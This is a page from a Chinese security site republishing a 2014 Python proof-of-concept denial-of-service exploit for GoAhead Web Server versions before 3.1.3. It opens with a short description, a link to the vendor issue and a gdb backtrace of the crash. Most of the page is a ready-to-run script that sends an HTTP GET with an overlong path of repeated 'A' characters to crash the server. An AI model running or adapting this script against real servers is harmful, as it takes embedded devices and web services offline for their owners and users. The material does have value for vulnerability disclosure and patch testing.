首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
GoAhead Web Server 3.1.x - Denial of Service
来源:vfocus.net 作者:MESBAHI 发布时间:2014-02-27  
#!/usr/bin/python
  
'''
GoAhead Web Server version prior to 3.1.3 is vulnerable to DoS. A fix exists for version 3.2.
The Web Server crashes completely once this requests is received. The vulnerability doesn't seem to be exploitable on Linux versions ... could be wrong :) !
  
Official Issue Post:
https://github.com/embedthis/goahead/issues/77
  
(gdb) bt
#0  0x00007ffff7a50425 in __GI_raise (sig=<optimized out>) at ../nptl/sysdeps/unix/sysv/linux/raise.c:64
#1  0x00007ffff7a53b8b in __GI_abort () at abort.c:91
#2  0x00007ffff7a8e39e in __libc_message (do_abort=2, fmt=0x7ffff7b98748 "*** glibc detected *** %s: %s: 0x%s ***\n") at ../sysdeps/unix/sysv/linux/libc_fatal.c:201
#3  0x00007ffff7a98b96 in malloc_printerr (action=3, str=0x7ffff7b98838 "munmap_chunk(): invalid pointer", ptr=<optimized out>) at malloc.c:5039
#4  0x00007ffff7fdc607 in termWebs (wp=0x40cfc0, reuse=<optimized out>) at src/http.c:457
#5  0x00007ffff7fdc91b in reuseConn (wp=0x40cfc0) at src/http.c:520
#6  complete (wp=0x40cfc0, reuse=1) at src/http.c:575
#7  0x00007ffff7fdd85f in websPump (wp=0x40cfc0) at src/http.c:837
#8  0x00007ffff7fdeac8 in readEvent (wp=0x40cfc0) at src/http.c:797
#9  socketEvent (wptr=0x40cfc0, mask=2, sid=<optimized out>) at src/http.c:735
#10 socketEvent (sid=<optimized out>, mask=2, wptr=0x40cfc0) at src/http.c:723
#11 0x00007ffff7fdee38 in websAccept (sid=1, ipaddr=0x7fffffffd990 "127.0.0.1", port=54172, listenSid=<optimized out>) at src/http.c:714
#12 0x00007ffff7feb66a in socketAccept (sp=0x40cb80) at src/socket.c:327
#13 0x00007ffff7feb7c8 in socketDoEvent (sp=0x40cb80) at src/socket.c:639
#14 socketProcess () at src/socket.c:623
#15 0x00007ffff7fd93ed in websServiceEvents (finished=0x4030f0) at src/http.c:1290
#16 0x00000000004012ee in main (argc=<optimized out>, argv=0x7fffffffdfd8, envp=<optimized out>) at src/goahead.c:146
'''
  
  
import socket
import os
import sys
import struct
  
HOST = sys.argv[1]
PORT = int(sys.argv[2])
  
crash = '?'*1 + 'A' * 1000
  
payload = 'GET ' + crash + ' HTTP/1.1\r\n'
payload += 'Host: ' + HOST + ':' + str(PORT) + '\r\n\r\n'
  
expl = socket.socket ( socket.AF_INET, socket.SOCK_STREAM )
expl.connect((HOST,PORT))
expl.send(payload)
data = expl.recv(1024)
print data
expl.close()
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Symantec Endpoint Protection M
·GoldMP4Player Buffer Overflow
·Python socket.recvfrom_into()
·GoldMP4Player 3.3 - Buffer Ove
·Embedthis Goahead 3.1.3-0 Deni
·Music AlarmClock 2.1.0 - (.m3u
·Python socket.recvfrom_into()
·VCDGEAR 3.50 Stack Buffer Over
·Symantec Endpoint Protection M
·Total Video Player 1.3.1 (Sett
·SolidWorks Workgroup PDM 2014
·GE Proficy CIMPLICITY gefebt.e
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved